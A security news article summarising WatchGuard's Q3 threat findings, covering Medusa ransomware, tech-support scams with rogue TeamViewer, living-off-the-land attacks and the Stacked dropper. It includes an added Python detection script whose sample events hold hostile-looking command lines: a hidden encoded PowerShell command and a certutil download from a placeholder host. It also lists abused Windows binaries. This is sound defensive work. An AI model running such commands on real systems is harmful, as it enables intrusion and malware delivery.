Cybercriminals still favour attacking exposed remote access products, or abuse legitimate remote access tools to hide their malicious activity, according to WatchGuard.
Medusa ransomware variant surges in Q3. Threat actors increasingly use remote management tools and software to evade anti-malware detection, which both the FBI and CISA have acknowledged.
In researching the top phishing domains, the Threat Lab observed a tech support scam that would result in a victim downloading a pre-configured, unauthorised version of TeamViewer, which would allow an attacker full remote access to their computer.
When factoring in the Medusa detections, ransomware attacks rose 89% quarter over quarter.
Threat actors pivot from using script-based attacks and increasingly employ other living-off-the-land techniques.
Malicious scripts declined as an attack vector by 11% in Q3 after dropping by 41% in Q2. Still, script-based attacks remain the largest attack vector, accounting for 56% of total attacks, and scripting languages like PowerShell are often used in living-off-the-land attacks.
Windows living-off-the-land binaries increased 32%. These findings indicate to Threat Lab researchers that threat actors continue to utilise multiple living-off-the-land techniques, likely in response to more protections around PowerShell and other scripting.
Living-off-the-land attacks make up the most endpoint attacks.
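Both behaviours the report highlights, abuse of legitimate remote access tools and living-off-the-land binaries including PowerShell, leave traces in ordinary process-creation telemetry. The following is an added example, not code from WatchGuard or from the article, that runs a small triage pass over constructed process-creation events: it decodes PowerShell `-EncodedCommand` payloads, flags native Windows binaries that are handed a URL, and flags a remote access tool launched from a user-writable directory (the pattern in the TeamViewer tech-support scam above). The event fields, file paths, watch-lists and sample events are assumptions made for the example, not values from the page.

```python
"""
Added example (not from the WatchGuard report or the article): triage of
constructed process-creation events for living-off-the-land binary abuse
and remote access tools launched from user-writable locations.
Field names, paths and watch-lists are assumptions for this example.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Native Windows binaries often abused as living-off-the-land tools.
# Assumed watch-list; tune it to the environment.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "bitsadmin.exe"}

# Legitimate remote access tools: benign when IT deploys them, suspicious
# when they run from a download or temp directory. Assumed list.
REMOTE_ACCESS_TOOLS = {"teamviewer.exe", "anydesk.exe", "screenconnect.exe"}

# Directories an ordinary user can write to (assumed patterns).
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\", re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def decode_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE) or None."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events: List[dict]) -> List[Finding]:
    """Apply the three rules to each event; return findings in event order."""
    findings: List[Finding] = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        if image == "powershell.exe":
            payload = decode_powershell(cmd)
            if payload is not None:
                findings.append(Finding(ev["id"], "powershell_encoded", payload.strip()))
        elif image in LOLBINS:
            # A system binary reaching out to a URL is a classic LOLBin pattern.
            if re.search(r"https?://", cmd, re.I):
                findings.append(Finding(ev["id"], "lolbin_remote_fetch", cmd))
        elif image in REMOTE_ACCESS_TOOLS and USER_WRITABLE.search(ev["image"]):
            findings.append(Finding(ev["id"], "rat_from_user_dir", ev["image"]))
    return findings


# Constructed sample events (not real telemetry). The encoded command is
# built here so the sample stays readable; attackers ship it pre-encoded.
ENCODED_WHOAMI = base64.b64encode("whoami".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_WHOAMI},
    {"id": 3, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.invalid/x.txt x.txt"},
    {"id": 4, "image": r"C:\Users\alice\Downloads\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"id": 5, "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
```

Event 5 deliberately stays silent: the same TeamViewer binary under `Program Files` is what a legitimate IT deployment looks like, so the rule keys on launch location rather than on the tool's name alone, which is the distinction the report's point about legitimate tools demands.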
Malware over encrypted channels sees notable decline.
Malware arriving over encrypted connections declined to 48%, meaning just under half of all malware detected came via encrypted traffic.
This figure is notable because it is down considerably from previous quarters.
Overall, total malware detections increased by 14%. An email-based dropper family that delivers malicious payloads comprised four of the Top 5 encrypted malware detections in Q3. All but one of the variants in the Top 5 contained the dropper family named Stacked, which arrives as an attachment in an email spear phishing attempt.
Threat actors will send emails with malicious attachments that appear to come from a known sender and claim to include an invoice or important document for review, aiming to trick end users into downloading malware.
The Stacked dropper delivers the adware variant 2345explorer as well as the Vidar password stealer.
Network attacks saw a 16% increase in Q3. ProxyLogon was the number-one vulnerability targeted in network attacks, comprising 10% of all network detections in total.
Three new signatures appeared in the Top 50 network attacks.
These included a PHP Common Gateway Interface (CGI) Apache vulnerability from 2012 that would result in a buffer overflow, and a .NET Framework 2.0 vulnerability from 2016 that could result in a denial-of-service attack.
There was also a SQL injection vulnerability in Drupal, the open-source CMS, from 2014.
This vulnerability allowed attackers to remotely exploit Drupal without any need for authentication.
This Cyber News was published on www.helpnetsecurity.com. Publication date: Mon, 11 Dec 2023 05:43:05 +0000